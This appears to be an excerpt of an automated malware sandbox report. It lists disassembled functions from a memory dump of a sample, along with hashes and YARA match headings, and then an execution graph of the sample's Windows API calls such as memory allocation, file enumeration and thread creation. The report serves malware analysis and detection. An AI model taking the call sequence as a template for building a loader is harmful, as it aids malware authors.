                                                            • Instruction Fuzzy Hash: 9AD1E9B5910704AFDB10EFA4CD85FEEB7F8BF58300F04891EE559AA241E779A9058B60
                                                            Function 03A6B582 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$P$e$i$m$o$r$x
                                                            • API String ID: 0-620024284
                                                            • Opcode ID: 5f942211aee03ba153e156a4f080f09a7accba2767622f5f07727fcdd638e7e4
                                                            • Instruction ID: 436064e7d7c3e203ac3c3e8bedd25fdef3d7de07919ee82227048119c97219c3
                                                            • Opcode Fuzzy Hash: 5f942211aee03ba153e156a4f080f09a7accba2767622f5f07727fcdd638e7e4
                                                            • Instruction Fuzzy Hash: 614152B9901318B6DB20EFA48D44EDF737CAF54300F40859EA50DAB241EBB5974D8FA1
                                                            Function 03A6B57D Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$P$e$i$m$o$r$x
                                                            • API String ID: 0-620024284
                                                            • Opcode ID: 479994489971b5be046ffe758a185202d1abf4df93a57e4d86fadde2066cee02
                                                            • Instruction ID: 6c638ba7579d83c5d94760014138a0ca578628f85e1b2ec80a827e664cac6d12
                                                            • Opcode Fuzzy Hash: 479994489971b5be046ffe758a185202d1abf4df93a57e4d86fadde2066cee02
                                                            • Instruction Fuzzy Hash: FE4152B9901318BADB20EFA0CD44FDE7378AF54300F40859EA50DAB241EBB5974D8FA1
                                                            Function 03A786A2 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L$S$\$a$c$e$l
                                                            • API String ID: 0-3322591375
                                                            • Opcode ID: 63d9098b9b19b9f4de7ffec20646db3c996411f27f8c8f41cf0547d7dd4af42e
                                                            • Instruction ID: 24614df6d0116cd66335948318659624bf111a12f57edc17fbf5b7983f97f3b3
                                                            • Opcode Fuzzy Hash: 63d9098b9b19b9f4de7ffec20646db3c996411f27f8c8f41cf0547d7dd4af42e
                                                            • Instruction Fuzzy Hash: 624197B6C04318BECB50DF94DC88BEEB7F8BF48310F05425ED809AB201E7755A458B90
                                                            Function 03A70222 Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: F$P$T$f$r$x
                                                            • API String ID: 0-2523166886
                                                            • Opcode ID: 636f84fe60dae66a223d2f789e5b3c89d98229421f1b43c0bdc83a8026880a82
                                                            • Instruction ID: 3f1baba963e0b999af904243b29bd1132f259275e761ed872d61cd4523865df5
                                                            • Opcode Fuzzy Hash: 636f84fe60dae66a223d2f789e5b3c89d98229421f1b43c0bdc83a8026880a82
                                                            • Instruction Fuzzy Hash: 1751B3B1900304BAEB34EF64CD85BEBF7F8AF14704F04456EE5099A281E7B4A649CB91
                                                            Function 03A70213 Relevance: 7.5, Strings: 6, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: F$P$T$f$r$x
                                                            • API String ID: 0-2523166886
                                                            • Opcode ID: 6c5d3af1d48fb4c3d4f364269f20b0e35633e3430236264650c6705f878aee10
                                                            • Instruction ID: 3acd15f8fd57761e71c73916f0c7982ea0ec24c3dbf5d005d9a8d045951c2517
                                                            • Opcode Fuzzy Hash: 6c5d3af1d48fb4c3d4f364269f20b0e35633e3430236264650c6705f878aee10
                                                            • Instruction Fuzzy Hash: 1C01D2B0C003086ADB24DFA48904ADFBFB9AF01704F00815ED8047F241E7B64A0D8BD0
                                                            Function 03A5CA72 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: C$Z$[$`$f$p
                                                            • API String ID: 0-518084781
                                                            • Opcode ID: ce34b63da57df3aa10a4e5694d9c1efd90943e76aa992db27115448b1e3b0fe3
                                                            • Instruction ID: 8f1dd12d98b00b89b904378c1da147c463c2287c65c41abbb7be41601d9f6106
                                                            • Opcode Fuzzy Hash: ce34b63da57df3aa10a4e5694d9c1efd90943e76aa992db27115448b1e3b0fe3
                                                            • Instruction Fuzzy Hash: 4511DB20D087CEDDDB12C6BC84146AEBF715F23224F0883D9D9A52B2D2D2794716D7A6
                                                            Function 03A6F922 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $i$l$o$u
                                                            • API String ID: 0-2051669658
                                                            • Opcode ID: ac245bbb8fef34ca08ee8a0a2085b8f9dc3aa41becb5ed50aa3959b3347dc62f
                                                            • Instruction ID: e7a0fd9a4f971a2de79e6530f4a05e2e8ce9534530f7eb253fcfe801c2dfc031
                                                            • Opcode Fuzzy Hash: ac245bbb8fef34ca08ee8a0a2085b8f9dc3aa41becb5ed50aa3959b3347dc62f
                                                            • Instruction Fuzzy Hash: B7613CB6900308AFDB24DBA4DC80FEFB7FDAB88710F14455DE559A7240EB35AA45CB60
                                                            Function 03A6F91E Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $i$l$o$u
                                                            • API String ID: 0-2051669658
                                                            • Opcode ID: 9aadd20ca09918a20065aa89da7d12a8e1526951e9da892c301a092102ebb2ff
                                                            • Instruction ID: 7468ea12439b5398ac9312537035cc96f2b4446c7794d5e041ecc3aafb118cab
                                                            • Opcode Fuzzy Hash: 9aadd20ca09918a20065aa89da7d12a8e1526951e9da892c301a092102ebb2ff
                                                            • Instruction Fuzzy Hash: 0D4109B5900308AFDB20DFA4DC84FEFBBF9AB48700F104559E559AB240E775AA45CB60
                                                            Function 03A6F5B2 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                            • Instruction ID: 641b2c5afae66224d4761dd078d672003b693fc3239ecf20bad80cd9e029e860
                                                            • Opcode Fuzzy Hash: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                            • Instruction Fuzzy Hash: 7FB12AB6A00309AFDB24DBA4DC84FEFB7BDAF88700F14855DF659A7240D674AA41CB50
                                                            Function 03A6FEF2 Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$h$o
                                                            • API String ID: 0-3662636641
                                                            • Opcode ID: 9091d2b4f7965116894649d74a519db72ecc851b061c234f20d2fad07d067166
                                                            • Instruction ID: 06e5645be220e575ccbd3c6f8bbc79731585029a90d0ce79c7cb24e70763b0f0
                                                            • Opcode Fuzzy Hash: 9091d2b4f7965116894649d74a519db72ecc851b061c234f20d2fad07d067166
                                                            • Instruction Fuzzy Hash: 218152B68012187ADB25EB90CD85FEFB37CBF48700F44859FE509AA141EB745B498FA1
                                                            Function 03A6F5AF Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: 1905cef126baac4c665e76a0e5284e2342bf9e43182b30b192713a6dc671beb0
                                                            • Instruction ID: 3661eb1624ded4a523425b575460c284371ca810bf1177e0f5620148a6c7dead
                                                            • Opcode Fuzzy Hash: 1905cef126baac4c665e76a0e5284e2342bf9e43182b30b192713a6dc671beb0
                                                            • Instruction Fuzzy Hash: 8D613CB5A00309AFDB24DFA4DC84FEFB7BDAF88700F144559E6599B240DB35AA41CB60
                                                            Function 03A6F472 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                            • API String ID: 0-2877786613
                                                            • Opcode ID: 68c6be0a5652bd195a9cb4bd804981698cb68b864359a1e369fef82b6676bac5
                                                            • Instruction ID: 7a9850af032e0ec8fcd8f0db9398dc35dee896b159ad9de72cb552a8db1c9686
                                                            • Opcode Fuzzy Hash: 68c6be0a5652bd195a9cb4bd804981698cb68b864359a1e369fef82b6676bac5
                                                            • Instruction Fuzzy Hash: E7417EB5911658BEEB01EF90CD42FFF7B7CAF55704F00414AFA046A281E7746B0987A6
                                                            Function 03A6F46F Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                            • API String ID: 0-2877786613
                                                            • Opcode ID: 8aa529fe588887f0d8df0f6d35d7aa4efa76b3ea07955779a08ced1042b85981
                                                            • Instruction ID: 24229dbca47afff229455f28c4c36578f212e92cf4b1b9dca46a91eed7ee4e9f
                                                            • Opcode Fuzzy Hash: 8aa529fe588887f0d8df0f6d35d7aa4efa76b3ea07955779a08ced1042b85981
                                                            • Instruction Fuzzy Hash: BE317EB5911658BEEB01EF90CD42FFF7B7CAF55704F00414AFA04AA281E7746B0987A6
                                                            Function 03A6FEEB Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$h$o
                                                            • API String ID: 0-3662636641
                                                            • Opcode ID: de8336d6e7b8a9d3990493c2b610c7c7e449cdead3cb6e8c84fd3fa7f7d11627
                                                            • Instruction ID: f110de40bccfaca07c415acb9f25b2750f00523d88cff88f4e001607635160e1
                                                            • Opcode Fuzzy Hash: de8336d6e7b8a9d3990493c2b610c7c7e449cdead3cb6e8c84fd3fa7f7d11627
                                                            • Instruction Fuzzy Hash: 544142B5D01318AADB20EF64CD44FEEB378FF48700F04859AE50DAA240EB745B888F95
                                                            Function 03A6B762 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2$3$7$l
                                                            • API String ID: 0-1672800730
                                                            • Opcode ID: f6a67dba33d12b8fb8415ec1013720264c4e82e676b7512e808a929d760b7ca5
                                                            • Instruction ID: 9a7287206ee31a9136e62bb48e4e2ce7471bc620fe98ea69ff7ebd2fda7e8980
                                                            • Opcode Fuzzy Hash: f6a67dba33d12b8fb8415ec1013720264c4e82e676b7512e808a929d760b7ca5
                                                            • Instruction Fuzzy Hash: 8D3134B5A11209BBDB14DF94CD41FFEB7B8FF14304F044199E908AB241E775AA058BE5
                                                            Function 03A6CB7A Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                            • Instruction ID: bd0a46c60ed3358457e862c78082ff488f296bb72e969706e88979e097ef4710
                                                            • Opcode Fuzzy Hash: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                            • Instruction Fuzzy Hash: 2E11E7B6900308ABCB14DFA4DC84ADEBBB9FF09714F04825EE9195F202E371D508CBA0
                                                            Function 03A6CB82 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                            • Instruction ID: 7972559b80a5b9ea56410c2bc1bd0366e0038e088702561460408339fcc88999
                                                            • Opcode Fuzzy Hash: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                            • Instruction Fuzzy Hash: 080184B2900318ABDB14DF98D884ADEF7B9FF08714F04825EE9195B201E771D549CBA0

                                                            Execution Graph

                                                            Execution Coverage:2.6%
                                                            Dynamic/Decrypted Code Coverage:4.3%
                                                            Signature Coverage:2.5%
                                                            Total number of Nodes:437
                                                            Total number of Limit Nodes:71
                                                            execution_graph 98171 707030 98172 707049 98171->98172 98180 70709c 98171->98180 98172->98180 98181 7193a0 98172->98181 98173 7071d4 98175 707064 98184 706450 NtClose LdrInitializeThunk LdrInitializeThunk 98175->98184 98177 7071ae 98177->98173 98186 706620 NtClose LdrInitializeThunk LdrInitializeThunk 98177->98186 98180->98173 98185 706450 NtClose LdrInitializeThunk LdrInitializeThunk 98180->98185 98182 7193ba 98181->98182 98183 7193cb NtClose 98182->98183 98183->98175 98184->98180 98185->98177 98186->98173 98187 705ab0 98192 707fe0 98187->98192 98189 705ae0 98191 705b0c 98189->98191 98196 707f60 98189->98196 98193 707ff3 98192->98193 98203 718900 98193->98203 98195 70801e 98195->98189 98197 707fa4 98196->98197 98198 707fc5 98197->98198 98209 7186d0 98197->98209 98198->98189 98200 707fb5 98201 707fd1 98200->98201 98202 7193a0 NtClose 98200->98202 98201->98189 98202->98198 98204 718981 98203->98204 98206 71892e 98203->98206 98208 48f2dd0 LdrInitializeThunk 98204->98208 98205 7189a6 98205->98195 98206->98195 98208->98205 98210 718750 98209->98210 98212 7186fe 98209->98212 98214 48f4650 LdrInitializeThunk 98210->98214 98211 718775 98211->98200 98212->98200 98214->98211 98215 70f730 98216 70f794 98215->98216 98244 7061c0 98216->98244 98218 70f8ce 98219 70f8c7 98219->98218 98251 7062d0 98219->98251 98221 70fa73 98222 70f94a 98222->98221 98223 70fa82 98222->98223 98255 70f510 98222->98255 98224 7193a0 NtClose 98223->98224 98226 70fa8c 98224->98226 98227 70f986 98227->98223 98228 70f991 98227->98228 98264 71b560 98228->98264 98230 70f9ba 98231 70f9c3 98230->98231 98232 70f9d9 98230->98232 98233 7193a0 NtClose 98231->98233 98267 70f400 98232->98267 98235 70f9cd 98233->98235 98236 70f9e7 98271 718e60 98236->98271 98238 70fa62 98239 7193a0 NtClose 98238->98239 98240 70fa6c 98239->98240 98275 71b480 98240->98275 98242 70fa05 98242->98238 98243 718e60 LdrInitializeThunk 98242->98243 98243->98242 98245 7061f3 98244->98245 98246 706217 98245->98246 98278 718f00 98245->98278 98246->98219 98248 70623a 98248->98246 98249 7193a0 NtClose 98248->98249 98250 7062ba 98249->98250 98250->98219 98252 7062f5 98251->98252 98283 718d10 98252->98283 98256 70f52c 98255->98256 98288 704460 98256->98288 98258 70f54a 98259 70f553 98258->98259 98260 704460 LdrLoadDll 98258->98260 98259->98227 98261 70f61e 98260->98261 98262 704460 LdrLoadDll 98261->98262 98263 70f678 98261->98263 98262->98263 98263->98227 98292 7196d0 98264->98292 98266 71b57b 98266->98230 98268 70f412 CoInitialize 98267->98268 98270 70f465 98268->98270 98269 70f4fb CoUninitialize 98269->98236 98270->98269 98272 718e7a 98271->98272 98295 48f2ba0 LdrInitializeThunk 98272->98295 98273 718eaa 98273->98242 98296 719720 98275->98296 98277 71b499 98277->98221 98279 718f1d 98278->98279 98282 48f2ca0 LdrInitializeThunk 98279->98282 98280 718f49 98280->98248 98282->98280 98284 718d2a 98283->98284 98287 48f2c60 LdrInitializeThunk 98284->98287 98285 706369 98285->98222 98287->98285 98289 704484 98288->98289 98290 7044c0 LdrLoadDll 98289->98290 98291 70448b 98289->98291 98290->98291 98291->98258 98293 7196ea 98292->98293 98294 7196fb RtlAllocateHeap 98293->98294 98294->98266 98295->98273 98297 71973a 98296->98297 98298 71974b RtlFreeHeap 98297->98298 98298->98277 98299 710030 98300 710053 98299->98300 98301 704460 LdrLoadDll 98300->98301 98302 710077 98301->98302 98303 718830 98304 7188c2 98303->98304 98306 71885e 98303->98306 98308 48f2ee0 LdrInitializeThunk 98304->98308 98305 7188f3 98308->98305 98309 715f70 98310 715fca 98309->98310 98312 715fd7 98310->98312 98313 713980 98310->98313 98320 71b3f0 98313->98320 98315 7139be 98316 704460 LdrLoadDll 98315->98316 98318 713ace 98315->98318 98319 713a04 98316->98319 98317 713a50 Sleep 98317->98319 98318->98312 98319->98317 98319->98318 98323 719510 98320->98323 98322 71b421 98322->98315 98324 7195a8 98323->98324 98326 71953e 98323->98326 98325 7195be NtAllocateVirtualMemory 98324->98325 98325->98322 98326->98322 98327 7189b0 98328 7189cd 98327->98328 98331 48f2df0 LdrInitializeThunk 98328->98331 98329 7189f5 98331->98329 98337 700d3b PostThreadMessageW 98338 700d4d 98337->98338 98339 709aff 98340 709b0f 98339->98340 98341 709b16 98340->98341 98342 71b480 RtlFreeHeap 98340->98342 98342->98341 98343 70c4e0 98345 70c509 98343->98345 98344 70c60d 98345->98344 98346 70c5b3 FindFirstFileW 98345->98346 98346->98344 98348 70c5ce 98346->98348 98347 70c5f4 FindNextFileW 98347->98348 98349 70c606 FindClose 98347->98349 98348->98347 98349->98344 98350 711a20 98353 711a39 98350->98353 98351 711a84 98352 71b480 RtlFreeHeap 98351->98352 98354 711a94 98352->98354 98353->98351 98355 711ac4 98353->98355 98357 711ac9 98353->98357 98356 71b480 RtlFreeHeap 98355->98356 98356->98357 98358 7190a0 98359 71915a 98358->98359 98361 7190d2 98358->98361 98360 719170 NtCreateFile 98359->98360 98362 6f9e36 98363 6f9e0c 98362->98363 98368 6f9e39 98362->98368 98364 6f9e30 98363->98364 98365 6f9e1d CreateThread 98363->98365 98366 6fa592 98368->98366 98369 71b0e0 98368->98369 98370 71b106 98369->98370 98375 6f4020 98370->98375 98372 71b112 98373 71b14b 98372->98373 98378 715500 98372->98378 98373->98366 98382 703120 98375->98382 98377 6f402d 98377->98372 98379 715562 98378->98379 98381 71556f 98379->98381 98400 701910 98379->98400 98381->98373 98383 70313d 98382->98383 98385 703156 98383->98385 98386 719e10 98383->98386 98385->98377 98388 719e2a 98386->98388 98387 719e59 98387->98385 98388->98387 98393 718a00 98388->98393 98391 71b480 RtlFreeHeap 98392 719ed2 98391->98392 98392->98385 98394 718a1d 98393->98394 98397 48f2c0a 98394->98397 98395 718a49 98395->98391 98398 48f2c1f LdrInitializeThunk 98397->98398 98399 48f2c11 98397->98399 98398->98395 98399->98395 98401 70194b 98400->98401 98416 707d70 98401->98416 98403 701953 98404 701c1d 98403->98404 98405 71b560 RtlAllocateHeap 98403->98405 98404->98381 98406 701969 98405->98406 98407 71b560 RtlAllocateHeap 98406->98407 98408 70197a 98407->98408 98409 71b560 RtlAllocateHeap 98408->98409 98410 701988 98409->98410 98414 701a1f 98410->98414 98431 706920 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98410->98431 98412 704460 LdrLoadDll 98413 701bd2 98412->98413 98427 717e40 98413->98427 98414->98412 98417 707d9c 98416->98417 98432 707c60 98417->98432 98420 707de1 98423 707dfd 98420->98423 98425 7193a0 NtClose 98420->98425 98421 707dc9 98422 707dd4 98421->98422 98424 7193a0 NtClose 98421->98424 98422->98403 98423->98403 98424->98422 98426 707df3 98425->98426 98426->98403 98428 717ea2 98427->98428 98430 717eaf 98428->98430 98443 701c30 98428->98443 98430->98404 98431->98414 98433 707d56 98432->98433 98434 707c7a 98432->98434 98433->98420 98433->98421 98438 718aa0 98434->98438 98437 7193a0 NtClose 98437->98433 98439 718abd 98438->98439 98442 48f35c0 LdrInitializeThunk 98439->98442 98440 707d4a 98440->98437 98442->98440 98459 708040 98443->98459 98445 701c50 98452 7021a6 98445->98452 98463 711060 98445->98463 98448 701e64 98471 71c650 98448->98471 98449 701cae 98449->98452 98466 71c520 98449->98466 98451 707fe0 LdrInitializeThunk 98455 701ec9 98451->98455 98452->98430 98453 701e79 98453->98455 98477 700760 98453->98477 98455->98451 98455->98452 98456 700760 LdrInitializeThunk 98455->98456 98456->98455 98457 702023 98457->98455 98458 707fe0 LdrInitializeThunk 98457->98458 98458->98457 98460 70804d 98459->98460 98461 708075 98460->98461 98462 70806e SetErrorMode 98460->98462 98461->98445 98462->98461 98464 71b3f0 NtAllocateVirtualMemory 98463->98464 98465 711081 98464->98465 98465->98449 98467 71c530 98466->98467 98468 71c536 98466->98468 98467->98448 98469 71b560 RtlAllocateHeap 98468->98469 98470 71c55c 98469->98470 98470->98448 98472 71c5c0 98471->98472 98473 71c61d 98472->98473 98474 71b560 RtlAllocateHeap 98472->98474 98473->98453 98475 71c5fa 98474->98475 98476 71b480 RtlFreeHeap 98475->98476 98476->98473 98478 70077c 98477->98478 98481 719640 98478->98481 98482 71965a 98481->98482 98485 48f2c70 LdrInitializeThunk 98482->98485 98483 700782 98483->98457 98485->98483 98486 48f2ad0 LdrInitializeThunk 98487 706c90 98488 706cba 98487->98488 98491 707e10 98488->98491 98490 706ce1 98492 707e2d 98491->98492 98498 718af0 98492->98498 98494 707e7d 98495 707e84 98494->98495 98503 718bd0 98494->98503 98495->98490 98497 707ead 98497->98490 98499 718b8b 98498->98499 98501 718b1b 98498->98501 98508 48f2f30 LdrInitializeThunk 98499->98508 98500 718bc4 98500->98494 98501->98494 98504 718c84 98503->98504 98505 718c02 98503->98505 98509 48f2d10 LdrInitializeThunk 98504->98509 98505->98497 98506 718cc9 98506->98497 98508->98500 98509->98506 98510 719210 98511 7192b7 98510->98511 98513 71923b 98510->98513 98512 7192cd NtReadFile 98511->98512 98519 711690 98520 7116ac 98519->98520 98521 7116d4 98520->98521 98522 7116e8 98520->98522 98524 7193a0 NtClose 98521->98524 98523 7193a0 NtClose 98522->98523 98526 7116f1 98523->98526 98525 7116dd 98524->98525 98529 71b5a0 RtlAllocateHeap 98526->98529 98528 7116fc 98529->98528 98530 703013 98531 707c60 2 API calls 98530->98531 98532 703023 98531->98532 98533 7193a0 NtClose 98532->98533 98534 70303f 98532->98534 98533->98534 98535 6f9e40 98538 6fa15c 98535->98538 98536 6fa592 98537 71b0e0 13 API calls 98537->98536 98538->98536 98538->98537 98539 6fb400 98540 71b3f0 NtAllocateVirtualMemory 98539->98540 98541 6fca71 98540->98541 98544 70ac40 98549 70a950 98544->98549 98546 70ac4d 98563 70a5c0 98546->98563 98548 70ac69 98550 70a975 98549->98550 98574 708250 98550->98574 98553 70aac0 98553->98546 98555 70aad7 98555->98546 98556 70aace 98556->98555 98558 70abc5 98556->98558 98593 70a010 98556->98593 98560 70ac2a 98558->98560 98602 70a380 98558->98602 98561 71b480 RtlFreeHeap 98560->98561 98562 70ac31 98561->98562 98562->98546 98564 70a5d6 98563->98564 98567 70a5e1 98563->98567 98565 71b560 RtlAllocateHeap 98564->98565 98565->98567 98566 70a608 98566->98548 98567->98566 98568 708250 GetFileAttributesW 98567->98568 98569 70a922 98567->98569 98572 70a010 RtlFreeHeap 98567->98572 98573 70a380 RtlFreeHeap 98567->98573 98568->98567 98570 70a93b 98569->98570 98571 71b480 RtlFreeHeap 98569->98571 98570->98548 98571->98570 98572->98567 98573->98567 98575 708271 98574->98575 98576 708278 GetFileAttributesW 98575->98576 98577 708283 98575->98577 98576->98577 98577->98553 98578 713270 98577->98578 98579 71327e 98578->98579 98580 713285 98578->98580 98579->98556 98581 704460 LdrLoadDll 98580->98581 98582 7132ba 98581->98582 98583 7132c9 98582->98583 98606 712d30 LdrLoadDll 98582->98606 98585 71b560 RtlAllocateHeap 98583->98585 98589 713474 98583->98589 98586 7132e2 98585->98586 98587 71346a 98586->98587 98586->98589 98591 7132fe 98586->98591 98588 71b480 RtlFreeHeap 98587->98588 98587->98589 98588->98589 98589->98556 98590 71b480 RtlFreeHeap 98592 71345e 98590->98592 98591->98589 98591->98590 98592->98556 98594 70a036 98593->98594 98607 70da50 98594->98607 98596 70a0a8 98598 70a230 98596->98598 98600 70a0c6 98596->98600 98597 70a215 98597->98556 98598->98597 98599 709ed0 RtlFreeHeap 98598->98599 98599->98598 98600->98597 98612 709ed0 98600->98612 98603 70a3a6 98602->98603 98604 70da50 RtlFreeHeap 98603->98604 98605 70a42d 98604->98605 98605->98558 98606->98583 98608 70da74 98607->98608 98609 70da81 98608->98609 98610 71b480 RtlFreeHeap 98608->98610 98609->98596 98611 70dac4 98610->98611 98611->98596 98613 709eed 98612->98613 